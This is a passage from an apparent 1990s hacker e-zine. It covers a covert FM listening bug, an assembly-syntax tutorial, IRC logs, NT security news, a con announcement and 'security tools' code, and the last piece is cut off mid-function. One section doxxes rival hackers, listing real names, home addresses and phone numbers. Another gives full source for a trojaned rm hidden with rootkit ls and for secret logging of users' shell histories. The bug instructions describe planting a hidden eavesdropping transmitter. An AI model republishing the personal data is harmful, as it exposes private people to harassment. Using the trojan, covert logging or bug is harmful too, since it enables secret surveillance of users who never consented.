ideal application is to have the transmitter taped under a
desk, with the arial running straight down the back.

If you are looking for good electret mic's, you can get
really good ones out of dead mobile's :)

You should also ensure you dont over heat components when
you are soldering, especially the transistors and the mic.

Right, so grab the diags and go build it :)

I'll leave the attachment of the two cells up to you, but I
_don't_ recommmend attempting to solder them :) The best
arrangement is to tape the two cells together with wires 
on the top and bottom as shown in my mad ascii art:

                -----========== (+)
         [^^^^^^^^^^^^^^^^^^]
         \__________________/
         [^^^^^^^^^^^^^^^^^^]
         \__________________/
                -----========== (-)          

OK, so you have built it, and you want to know how to use it...

The bug transmit's around the 88 - 108 FM range,  and can be
picked up with any FM radio. To adjust the frequency, squeeze
together the turns of the 5 turn coil (oscillator coil) to 
shift the frequency up the range, and seperate the turns to
move down the range. To test it, place it near a radio
and tune over the whole FM band, and at some point near the 
lower end, you should hear a feedback whistle. Adjust the coil
unti you get  a frequency that is good (i.e free) and then you 
are ready for action :) Its a good idea to shrinkwrap the
project, but make sure you dont mess up the coils when you 
shrink it. 

Thats all...

I will put plans for a much more elaborate and enhanced bug
in crh (with Voice Operated Transmit and surface mount
components for small size :) as soon as I can be fucked with 
typing it up...

�������������������������������������������������������������������������������
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
�������������������������������������������������������������������������������
  1. AT&T and Intel assembly syntax.
�������������������������������������������������������������������������������

               Difference Between AT&T and Intel Assembly Syntax
               -------------------------------------------------
                            By (--==+*~Shok~*+==--)

The difference
--------------

This document is more related to coding than hacking, although assembly is
a very useful programming language, as it's machine level and gives you
the most direct access to the CPU, hardware, etc. Now in unix, the
compilers like gcc use att syntax assembly and not intel. For example:

__asm__("movl %esp, %ebp"); 

Now this is unfortunate for DOS asm programmers who recently installed linux.
Asm they don't know att syntax (they are used to intel)..who are used to mov ebp, esp
from the above example.

	So I added this because I've very rarely (only one in fact, to be honest),
document that explained (yah, it wasn't even a tutorial or anything ;) the
differences, how to get used to it etc.  

	First off, I'd like to mention the only place I've seen any
documentation on it, which was the manual for gas (which is GNU
asm....gnu's assembler). 
You can get info on that at:
http://www.cs.utah.edu/csinfo/texinfo under "gas"

First let me give a few examples. 
Intel: push 4
att: pushl $4

All the immediate operands have a $ in front of them, in intel syntax, you
don't have prefix.

The register operands, have a % in front of them, intel has none.
Intel: mov eax, 4
att: movl $4, %eax

You notice there is a diff in intel/att's src/dst...
Intel: you do dst, src like mov ax, 2  
att: it's the opposite, src, dst like movl $2, %ax

You can use 'b' for byte, 'w' for word, 'l' for long, etc...as the memory
suffix:
movl, movb, movw etc....
in intel you wold do this like mov ax, byte ptr foo...

The far instruction for att is lret $stack-adjust, in intel it's 
ret far stack-adjust.

The l in front of mov, is the byte/memory operand..... this is actually
more convient if you ask me.

also in intel......you have
section:[base + index*scale + disp]

disp=displcement
scale=1 if not given

in att however, it's like this:
section:disp(base,index,scale)

so es:[ebp-5] in intel
would be
%es:-4(%ebp)
in att

Intel: [foo]  AT&T: foo(,1) the ,1 means an index of one...
Inte: [foor + eax*4] AT&T: foor(,%eax,4)

I hope this helps :)

How to Get some assembly examples in unix:
-----------------------------------------
	 
Now how to get a few examples on how to get some assembly code
for unix......first of all you can do something like
this:

test.c:
void main()
{
printf("hi\n");
}

now to compile it, do gcc -S test.c, this will make a file test.s in
assembly......look at it it contains great info....and some examples of
the macros and what not defined/shown in gas' (GNU assembler) manual.
(Which can be found at http://www.cs.utah.edu/csinfo/texinfo, under gas.

here is what test.s will look like:

        .file   "test.c"
        .version        "01.01"
gcc2_compiled.:
.section        .rodata
.LC0:
        .string "test\n"
.text
        .align 4
.globl main
        .type    main,@function
main:
        pushl %ebp
        movl %esp,%ebp
        pushl $.LC0
        call printf
        addl $4,%esp
.L1:
        leave
        ret
.Lfe1:
        .size    main,.Lfe1-main
        .ident  "GCC: (GNU) 2.7.2.1"


As you know, the "l"'s in front of push,mov,add, etc....that means it's
type long.... and the % goes in front of all register operands, whereas in
intel syntax, it is undelimited. Likewise, the immediate operands, have a
$ in front of them, whereas once again, intel is undelimited.

movl $3, %eax 
is equal to:
mov eax, 3 
in intel

The other way to get asm code is with gdb......you compile your program
with gcc -g .......and for even more......gcc -g -a...
here is our test.c ......in gdb,
we do 'disassemble main':

(gdb) disassemble main
Dump of assembler code for function main:
0x8048474 <main>:       pushl  %ebp
0x8048475 <main+1>:     movl   %esp,%ebp
0x8048477 <main+3>:     pushl  $0x80484c8
0x804847c <main+8>:     call   0x8048378 <printf>
0x8048481 <main+13>:    addl   $0x4,%esp
0x8048484 <main+16>:    leave  
0x8048485 <main+17>:    ret    
End of assembler dump.

That is with just -g.......with -a as well you can see the difference
(more instructions show up that usually wouldn't):

(gdb) disassemble main
Dump of assembler code for function main:
0x80485d8 <main>:       pushl  %ebp
0x80485d9 <main+1>:     movl   %esp,%ebp
0x80485db <main+3>:     cmpl   $0x0,0x8049a6c
0x80485e2 <main+10>:    jne    0x80485f1 <main+25>
0x80485e4 <main+12>:    pushl  $0x8049a6c
0x80485e9 <main+17>:    call   0x80488fc <__bb_init_func>
0x80485ee <main+22>:    addl   $0x4,%esp
0x80485f1 <main+25>:    incl   0x8049b78
0x80485f7 <main+31>:    pushl  $0x8048978
0x80485fc <main+36>:    call   0x8048468 <printf>
0x8048601 <main+41>:    addl   $0x4,%esp
0x8048604 <main+44>:    incl   0x8049b7c
0x804860a <main+50>:    leave  
0x804860b <main+51>:    ret    
End of assembler dump.

I of course need to give credit of this to the gas manual, as parts were
taken from there.

Well I hope you enjoyed that little introduction. Any corrections let me
know as shok@onlinex.net or shok@janova.org.

                                  Shok
                          (--==+*~Shok~*+==--)

�������������������������������������������������������������������������������
  2. sIn inf0z : so1o
�������������������������������������������������������������������������������

                    Fucking sIn b1tchez bow to the elite.

�������������������������������������������������������������������������������

 Alias      :  Evil Chick
 Real Name  :  Suzette Kimminau
 Address    :  130 105th Ave. S.E. Apt. 218
               Bellevue, Wa 98004
               USA

 Telephone  :  (206)454-7176
 E-mail     :  evilchic@NWLINK.COM

-------------------------------------------------------------------------------

 Alias      :  \\StOrM\\
 Real Name  :  Jason Sloderbeck
 Address    :  5739 N Norton,
               Kansas City, MO 64119
               USA

 Telephone  :  (816)453-8722
 E-mail     :  storm@SINNERZ.COM

-------------------------------------------------------------------------------

 Alias      :  JDKane
 Real Name  :  Kim
 Address    :  327 E Park Road,
               Round Lake, IL 60073
               USA

 Telephone  :  (847)546-9154
 E-mail     :  

-------------------------------------------------------------------------------

 Alias      :  Soul Tear
 Real Name  :  Wesley Stroeber
 Address    :  10770 E. Silver Vein Dr.
               Tucson, Arizona 85710
               USA

 Telephone  :
 E-mail     :  soultear@mindspring.com

-------------------------------------------------------------------------------

 Alias      : Scud-O
 Real Name  : Kevin Shivers
 Address    : PO Box 448
              Sykesville, Maryland 21784
              USA

 Telephone  : (410)442-2410
 E-mail     : foxmulder@WORLDNET.ATT.NET

�������������������������������������������������������������������������������

      You want to know how lame sIn really are? check www.sinnerz.com

             The Hax0r brothers don't 0wn a car between them.

�������������������������������������������������������������������������������
  3. Wassup with NT?! : Crystalize
�������������������������������������������������������������������������������

You know... take a lok around you next time you happen to be at the
news sites of places like underground.org, and l0pht.com.  What is it you're
seeing all around you?  Shit about NT, thats what.  Windows NT is claimed to
have critical system holes in it that would allow a hakcer complete access
to any Nt system on the net.

You might ask yourself what Microsoft is doing in reponse to the
what these computer security consultants (hackers with a salary) have said.
Absolutely nothing!  Thats right!  You heard it first from Crystalize.  Well,
maybe not first, but by God I told it anyway.  But, back to the story.

Microsoft was told of these security flaws in the NT system and went
straight to work to correct these little problems.  Of course, the plugs for
these hoes, however, will not be coming out until the NT 5.0 upgrade 
sometime around 1998!  Hackers are going to have a big field day with NT.

Although I've spent the first of this article totally trashing
Microsoft for not taking immediate action by coming out with a patch for NT,
you do have to give them a little credit.  They actually swallowed their
pride and came asking for help.  Who do you think they asked?  Thats right,
Microsoft came crawling to the community of hackers.  It goes against every
policy that Microsoft has, but, what the hell, lets face it... they needed
some help.

Anyway, they came to L0pht and asked for help.  Why did they come to
l0pht?  Because it was L0phtcrack 1.5 that decrypted NT user passwords and
sent them back in plain text (pretty slick, l0pht.)  Okay, about this
meeting.  Microsoft sends these NT experts to talk with security experts 
from the government and the hacking community.  I'm going to quote someone
real quick.  NT marketing director Carl Karanan said this,"We came here 
to look at the hacker's perspective - to understand what they're thinking
and what their concerns are.  Its good to look at things in perspective;
this conference does that."

He also said something kinda nice, "We've opened up a dialogue.  The
hackers do a service.  We're listening and learning."  No shit, he really
said that... a Microsoft exec saying they're learning from the hackers.

Ok, heres another quote, only this one's from a hacker.  "What
we're trying to do as a community is point out some very serious problems
in an operating system that is used in corporate America and in goverments
worldwide, and we're pointing it out in a legitmate manner saying 'Fix
This.'", said Yobie Benjamin, a knowledge officer and NT hacker.

Then Mudge got up to speak and gave a little presentation about
L0phts new NT password cracking program.  An impressive audience to, which
I hear included execs from Toyota, ESPN, the Defense Department and the NSA.
(WAY TO GO MUDGE!)

Anyway, if you want to know exactly what the program does, head to
L0phts site at www.l0pht.com/advisories.  And you know what?  This program
I'm told is extremely powerful.  Here's a little taste of what it does.
Mudge says that if the program is launched from a Unix or Pentium Pro 200
on a corporation of 40,000 users that managed all usernames and Lanman/NT
passwords from one PDC (primary domain controller), it would only take 40
hours to decrypt all 40,000 passwords and give them to ya in plain text.
(DAMN!)

I really like this quote from Mudge, too, "Windows NT's backward
compatability always bite 'em on the ass."  HAHAHAHAHA!

Anyway, thats all I've got to report on that little bit of news.
Thanks for readin and let me know if ya want me to report on any other
stuff.  Later.

- Crystalize
  @#w|h|p|v on EFNet

�������������������������������������������������������������������������������
  4. More #hebrew : so1o
�������������������������������������������������������������������������������


<\\`a\\`> shit!!
<RoBoGi> [\\`a\\`] The M@$TER IS HeRe !!!! BE CAREFUL!!!
<\\`a\\`> som1 nuked me!!!

<{Jupiter}> mega!!
<{Jupiter}> how can one nuke me ..!!!
<{Jupiter}> meeeeeeeeeegggggggaaaaaaa
<MeGaMaN-> GREAT!!!!!!1
<MeGaMaN-> lens flare RULEEEEZZZZZ
<{Jupiter}> what greaT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
<{Jupiter}> som1 nuke me!!
<{Jupiter}> and  , i restared my pc!!
<{Jupiter}> mega!!
<{Jupiter}> r u therE?!?!?
<{Jupiter}> man!!
<{Jupiter}> meeeeeeeeeeeeggggggggggggggggggggggggggaaaaaaaaaaaaaa
<MeGaMaN-> YES
<MeGaMaN-> yes
<MeGaMaN-> i was in photoshop
<{Jupiter}> where r u ?
<MeGaMaN-> i was in photoshop4
<{Jupiter}> ok..
<{Jupiter}> so , tell me 
<{Jupiter}> how did 1 nuke me?!
<MeGaMaN-> what hapend?
<{Jupiter}> so1 nuke me
<MeGaMaN-> ur computer FREEZED?
<{Jupiter}> noooooooo
<{Jupiter}> the comp. was blue
<MeGaMaN-> so install the winnuke fix!!
<{Jupiter}> winnuke fix?!
<MeGaMaN-> yes
<{Jupiter}> i mean , so1 nuke me , and bomb
<{Jupiter}> i am not in wi95
<{Jupiter}> bom 
<{Jupiter}> i am in a blue!!!
<{Jupiter}> worming!!
<MeGaMaN-> [{Jupiter} VERSION reply]: mIRC32 v5.0 K.Mardam-Bey
<MeGaMaN-> u r on win95
<{Jupiter}> yep!
<MeGaMaN-> my fix is already installed
<MeGaMaN-> and i dont have him
<MeGaMaN-> it
<{Jupiter}> ok..
<{Jupiter}> where r all the boTS?!

�������������������������������������������������������������������������������
  5. Linking to /dev/zero : xFli
�������������������������������������������������������������������������������

[Tremle_(tremle@163.164.162.19)] cna I have the exploit mate, please
[msg(tremle_)] not yetr!$#!@$
[Tremle_(tremle@163.164.162.19)] why mate?
[Tremle_(tremle@163.164.162.19)] pleeease
[Tremle_(tremle@163.164.162.19)] mate, please sendmial 8.8.5 remote
[Tremle_(tremle@163.164.162.19)] and I won;t ask for anything ever again
>>> Tremle_ [tremle@163.164.162.19] requested PING from xFli
[msg(tremle_)] ....
[Tremle_(tremle@163.164.162.19)] just this one time
<xFli> hoho, i think the ol ln -s /dev/zero 885.remote.c trick could be useful
          here
��� DCC SEND connection with tremle_[163.164.162.19, port 1061] established
<xFli> ��� DCC SEND connection with tremle_[163.164.162.19, port 1061]
          established
[Tremle_(tremle@163.164.162.19)] is it remote?
[msg(tremle_)] YES
[Tremle_(tremle@163.164.162.19)] thansk mate
[msg(tremle_)] U better not bug me like this again
[Tremle_(tremle@163.164.162.19)] root shell? ;)
[Tremle_(tremle@163.164.162.19)] i won't
[Tremle_(tremle@163.164.162.19)] is it moving?
[msg(tremle)] so are u gonna give me something in return then?
[Tremle_(tremle@163.164.162.19)] :)
[Tremle_(tremle@163.164.162.19)] thankyou very much I relly appreciate
[Tremle_(tremle@163.164.162.19)] ok cary on with yer scripting
[msg(tremle_)] so are u gonna give me something in return then?
[Tremle_(tremle@163.164.162.19)] what you want?
[msg(tremle_)] something cool
[Tremle_(tremle@163.164.162.19)] how big is this btw?
[Tremle_(tremle@163.164.162.19)] uhm
[msg(tremle_)] its quite big, got a lot of shellcode in it, its actually quite
          a compliated sploit
[Tremle_(tremle@163.164.162.19)] what sorta thing you lookign for
[msg(tremle_)] just, well, anything
[Tremle_(tremle@163.164.162.19)] uhm
[msg(tremle_)] u got anything new?
[Tremle_(tremle@163.164.162.19)] I will hoepfully get soem on thursday
[Tremle_(tremle@163.164.162.19)] SunOS stuff
[msg(tremle_)] can't u gimme somethin now?
[Tremle_(tremle@163.164.162.19)] i shall have a look
[Tremle_(tremle@163.164.162.19)] tremle find's frantically
[msg(tremle_)] just anything cool...
[msg(tremle_)] u got any new bsd stuff?
[Tremle_(tremle@163.164.162.19)] I shall look
[Tremle_(tremle@163.164.162.19)] do they have to be remote?
[msg(tremle_)] naw, jus anything...
[Tremle_(tremle@163.164.162.19)] nope
[Tremle_(tremle@163.164.162.19)] this is taking a while, what size is it?
[msg(tremle_)] its about 400k
Tremle_(tremle@163.164.162.19)] k
[msg(tremle_)] ok, well, send me just well, do you have anything like eipscan
          2?
[Tremle_(tremle@163.164.162.19)] nope
[Tremle_(tremle@163.164.162.19)] uhm
[Tremle_(tremle@163.164.162.19)] so what would you prefer?
[msg(tremle_)] hmm...what bsd stuff do you have?
[Tremle_(tremle@163.164.162.19)] exploits.code or what?
[msg(tremle)] exploits...
[msg(tremle)] or some cool codez
[Tremle_(tremle@163.164.162.19)] rxvt exploit
[Tremle_(tremle@163.164.162.19)] rdist
[msg(tremle_)] rxvt for bsd?
[msg(tremle_)] send that
[Tremle_(tremle@163.164.162.19)] ok
[Tremle_(tremle@163.164.162.19)] wiat a sec
[Tremle_(tremle@163.164.162.19)] hmm, also slackware 3.0
[msg(tremle_)] just bsd
[msg(tremle_)] send bsd
��� DCC SEND (rxvt.txt) request from Tremle_[tremle@163.164.162.19
          [163.164.162.19:1097]]
��� Auto-getting file rxvt.txt from Tremle_
��� DCC GET connection with Tremle_[163.164.162.19, port 1097] established
��� DCC GET:rxvt.txt [2.269kb] from Tremle_ completed in 7 secs (0.3241
          kb/sec)
[msg(tremle_)] any other bsd stuff?
[Tremle_(tremle@163.164.162.19)] if it's old tell me
[Tremle_(tremle@163.164.162.19)] I have everything mixed up
[msg(tremle_)] whats the newest stuff you have?
[Tremle_(tremle@163.164.162.19)] wait a sec
[Tremle_(tremle@163.164.162.19)] procfs
[msg(tremle_)] i have that
[Tremle_(tremle@163.164.162.19)] screen
[msg(tremle_)] send that
[Tremle_(tremle@163.164.162.19)] ddb
msg(tremle_)] send that too
[Tremle_(tremle@163.164.162.19)] both?
[Tremle_(tremle@163.164.162.19)] wait a sec
[Tremle_(tremle@163.164.162.19)] dcc send xFLi
[Tremle_(tremle@163.164.162.19)] doh
[Tremle_(tremle@163.164.162.19)] I have put them in .html format, they were
          goan go on my webpage
[msg(tremle_)] s'ok, send em anywayz..
��� DCC SEND (ddbsd.html) request from Tremle_[tremle@163.164.162.19
          [163.164.162.19:1106]]
��� Auto-getting file ddbsd.html from Tremle_
��� DCC GET connection with Tremle_[163.164.162.19, port 1106] established
��� DCC GET:ddbsd.html [2.608kb] from Tremle_ completed in 17 secs (0.1534
          kb/sec)
[Tremle_(tremle@163.164.162.19)] how big is this?
[msg(tremle_)] should be nearly finished
[Tremle_(tremle@163.164.162.19)] k, what size is it?
[Tremle_(tremle@163.164.162.19)] how's the sploti work?
[msg(tremle_)] i thought it was like 400k but thatwas sommin else, its about
          950k i think
[Tremle_(tremle@163.164.162.19)] mm
[Tremle_(tremle@163.164.162.19)] sure you just haven;t renamed a file 885rem.c
          ?
[msg(tremle_)] like i said, its pretty complicated
<xFli> [Tremle_(tremle@163.164.162.19)] sure you just haven;t renamed a file
          885rem.c
<xFli>           ?
<xFli> OH! hes nearly caught on!
[Tremle_(tremle@163.164.162.19)] k
[Tremle_(tremle@163.164.162.19)] I;ll take yer word for it
[Tremle_(tremle@163.164.162.19)] what else you got btw?
[Tremle_(tremle@163.164.162.19)] can you check the filesize completelley?
[msg(tremle)] 2 secs
[Tremle_(tremle@163.164.162.19)] I mena will you check it?
>>> Tremle_ [tremle@163.164.162.19] requested PING from xFli
[Tremle_(tremle@163.164.162.19)] fuck
[msg(tremle_)] -r--------   1 root     root       933744 Aug  4 12:16 885rem.c
[Tremle_(tremle@163.164.162.19)] infiniete dcc
[Tremle_(tremle@163.164.162.19)] ?
[msg(tremle_)] 933 k
[Tremle_(tremle@163.164.162.19)] you did an infinite dcc?
[msg(tremle_)] no way dammit
[Tremle_(tremle@163.164.162.19)] serious have you?
[msg(tremle_)] serious. NO
[Tremle_(tremle@163.164.162.19)] ok
[Tremle_(tremle@163.164.162.19)] so1o thinks you have
[msg(tremle_)] wtf would so1o know?
[msg(tremle_)] i can't stand that g1mp
[Tremle_(tremle@163.164.162.19)] hmm
[Tremle_(tremle@163.164.162.19)] so what size is it again?
[msg(tremle_)] 933k
[Tremle_(tremle@163.164.162.19)] k
[Tremle_(tremle@163.164.162.19)] never seen an exploit this big before
>>> Tremle_ [tremle@163.164.162.19] requested PING from xFli
[Tremle_(tremle@163.164.162.19)] my spellign sukcs, im such a homo...
[Tremle_(tremle@163.164.162.19)] so1o is so cool
[Tremle_(tremle@163.164.162.19)] i smell
[Tremle_(tremle@163.164.162.19)] hey, you;re a fucking lair and sutff
��� DCC lost SEND to tremle_ [/home/security/885rem.c]

�������������������������������������������������������������������������������
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
�������������������������������������������������������������������������������

Like, nothing happened and stuff..

.so1o

�������������������������������������������������������������������������������
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
�������������������������������������������������������������������������������
  1. TOTALCON '98 : so1o
�������������������������������������������������������������������������������


                         http://www.aom.co.uk/total/

  +------------------------------------+------------------------------------+
  � An Official Total Con Announcement � An Official Total Con Announcement �
  � An Official Total Con Announcement � An Official Total Con Announcement �
  +------------------------------------+------------------------------------+

                         http://www.aom.co.uk/total/


 Total Con '98 is now a reality, here are preliminary details...
 ===============================================================

 Venue        :  The Old Firestation, Silver Street, Bristol, ENGLAND
 Date         :  Late March 1998   (probably the last week)
 Duration     :  1 night           (12:00pm -> 12:00pm next day)

 What         :  12 system network with internet access
                 Loud music
                 Fully licensed bar downstairs
                 Elite UV and spotlights
                 Channel 4 media coverage  (hopefully)

                 ALOT of cool people
                 ^^^^^^^^^^^^^^^^^^^
      *** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER ***


 Travel        : Easily accessible by car, train, bus or plane.
 Accomodation  : You can crash out in the Firestation (its HUGE) or book one
                 of many hotels in the immediate area.



                         http://www.aom.co.uk/total/

  +------------------------------------+------------------------------------+
  � An Official Total Con Announcement � An Official Total Con Announcement �
  � An Official Total Con Announcement � An Official Total Con Announcement �
  +------------------------------------+------------------------------------+

                         http://www.aom.co.uk/total/


�������������������������������������������������������������������������������
  2. Security / Monitoring tools : Shok
�������������������������������������������������������������������������������

                 SECURITY/MONITORING (some misc. tools I wrote)
                 ---------------------------------------------
                           By (--==+*~Shok~*+==--)
    
Okay, well........welcome to this thing......by Shok. 
What I plan for this to be, is some various utilities that you might think
as of use and what not. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`

and then do:
mkdir /tmp/hist;chmud 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls). 
There are two versions of this....I wrote the first one in shell script,
but do to the fact it has to be a+r, I wrote it in C afterwords. Here is
the rm.sh:

#!/bin/sh
# rm.sh -- rm "trojan" by (--==+*~Shok~*+==--) 

if [ $# > 1 ] 
then

case $1 in
-i)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;
--interactive)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $* 
;;

-f)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;; 
--force)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $* 
;;

-d)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;; 
--directory)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $* 
;;

-v)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;
--verbose)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $* 
;;

-r)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;; 
-R)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;; 
--recursive)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $* 
;;

-ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;
-Ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;

-rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null  
/bin/rm.bak -rf $*
;;
-Rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;

-rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;
-Rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;

-Rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;
-rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;

-fv)
shift
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -fv $*
;;

-Rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1   /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;
-rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1   /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;


cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak $*
;;
esac

else

IT=$1
cp -f $IT /tmp/fill
/bin/rm.bak $IT
fi
#----------------------------------------------------

You may have to change the line:
doexec /bin/rm.bak -i $*

to:
/bin/rm.bak -i $* 
if you do not have doexec which is on linux (or redhat anyway)



Now for rm.c:
 
/* ------------------------------------------------------ */
/* rm.c -- rm "trojan" by (--==+*~Shok~*+==--)            */
/* ------------------------------------------------------ */

#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h> 
#include <unistd.h>


void main(int argc, char **argv)
{
  struct stat filestats;
  int i;
  if (argc > 2) 
  	{
		if (strcmp("-i", argv[1])==0) goto interactive;
		if (strcmp("-f", argv[1])==0) goto force;
		if (strcmp("-v", argv[1])==0) goto verbose;
		if (strcmp("-r", argv[1])==0) goto recursive;
		if (strcmp("-rf", argv[1])==0) goto rf;
		if (strcmp("-ri", argv[1])==0) goto ri;
		if (strcmp("-rv", argv[1])==0) goto rv;
		if (strcmp("-rvf", argv[1])==0) goto rfv;
		if (strcmp("-rfv", argv[1])==0) goto rfv;
		if (strcmp("-Rvf", argv[1])==0) goto rfv;
		if (strcmp("-Rfv", argv[1])==0) goto rfv;
		if (strcmp("-frv", argv[1])==0) goto rfv;
		if (strcmp("-fvr", argv[1])==0) goto rfv;
		if (strcmp("-fRv", argv[1])==0) goto rfv;
		if (strcmp("-fvR", argv[1])==0) goto rfv;
		if (strcmp("-vfr", argv[1])==0) goto rfv;
		if (strcmp("-vrf", argv[1])==0) goto rfv;
		if (strcmp("-vfR", argv[1])==0) goto rfv;
		if (strcmp("-vRf", argv[1])==0) goto rfv;
		if (strcmp("-fr", argv[1])==0) goto rf;
		if (strcmp("-ir", argv[1])==0) goto ri;
		if (strcmp("-vr", argv[1])==0) goto rv;
		
		if (strcmp("--interactive", argv[1])==0) goto interactive;
		if (strcmp("--force", argv[1])==0) goto force;
		if (strcmp("--verbose", argv[1])==0) goto verbose;
		if (strcmp("--recursive", argv[1])==0) goto recursive;
  	} 

  else {
	setenv("PROGRAM", argv[1], 1);
	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	system("/bin/rm.bak $PROGRAM");
	unsetenv("PROGRAM");
  }


interactive:

  lstat(argv[2], &filestats);
  for (i=2;i<argc;i++) 
  {
 	 if (S_ISDIR(filestats.st_mode))
 	 {
		setenv("PROGRAM", argv[i], 2);
		system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
		unsetenv("PROGRAM");
		execl("/bin/rm.bak","rm","-i",argv[2],NULL);
	 } 

  	 else 
         {
		setenv("PROGRAM", argv[2], 1);
		system("cp -f $PROGRAM /tmp/fill &>/dev/null");
		unsetenv("PROGRAM");
		execl("/bin/rm.bak","rm","-i",argv[2],NULL);
         }    
  }

  
force:

  for (i=2;i<argc;i++) 
  {
  	setenv("PROGRAM", argv[i], 1);
  	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	execl("/bin/rm.bak","rm","-f",argv[i],NULL);
	unsetenv("PROGRAM");

  }


verbose:
  for (i=2;i<argc;i++) 
  {
	setenv("PROGRAM", argv[i], 1);
	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	execl("/bin/rm.bak","rm","-v",argv[i],NULL);
	unsetenv("PROGRAM");
  }

recursive:
  for (i=2;i<argc;i++) 
  {
  	setenv("PROGRAM", argv[i], 1);
  	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
  	execl("/bin/rm.bak","rm","-r",argv[i],NULL);
  	unsetenv("PROGRAM");
  }

rf:

  for (i=2;i<argc;i++) 
  {
	lstat(argv[i], &filestats);
	if (S_ISDIR(filestats.st_mode))
	{
		setenv("PROGRAM", argv[i], 1);
		system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
		unsetenv("PROGRAM");
		execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
	}
	else 
	{
		setenv("PROGRAM", argv[i], 1);
		system("cp -f $PROGRAM /tmp/fill &>/dev/null");
		unsetenv("PROGRAM");
		execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
	}
  } 


ri:

  for (i=2;i<argc;i++) 
  {
	setenv("PROGRAM", argv[i], 1);
	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	execl("/bin/rm.bak","rm","-ri",argv[i],NULL);
	unsetenv("PROGRAM");
  }


rv:

  for (i=2;i<argc;i++) 
  {
	setenv("PROGRAM", argv[i], 1);
	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	execl("/bin/rm.bak","rm","-rv",argv[i],NULL);
	unsetenv("PROGRAM");
  }

rfv:

  for (i=2;i<argc;i++) 
  {
	setenv("PROGRAM", argv[i], 1);
	system("cp -f $PROGRAM /tmp/fill &>/dev/null");
	execl("/bin/rm.bak","rm","-rfv",argv[i],NULL);
	unsetenv("PROGRAM");
  }

}

This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....

Now when ever a user deletes something it will first be copied to
/tmp/fill before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time. 

phf.c:


/* ----------------------------------------------------- */
/* phf "trojan" by (--==+*~Shok~*+==--)			 */
/* ----------------------------------------------------- */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main()
{ 

FILE *tmpfile, *fingerinfo;
char *host, *addr, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST"); 
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING"); 

/* This is to prevent a finger war, the ip address below is my ip address */
/* just to be on the safe side. But I do have in.fingerd: LOCAL to allow  */
/* me to finger without starting a finger war. 				  */
if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0); 

system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1");

tmpfile=fopen("/var/tmp/.phf", "w"); 
fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");

fprintf(tmpfile, "The following person used phf!!\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string); 

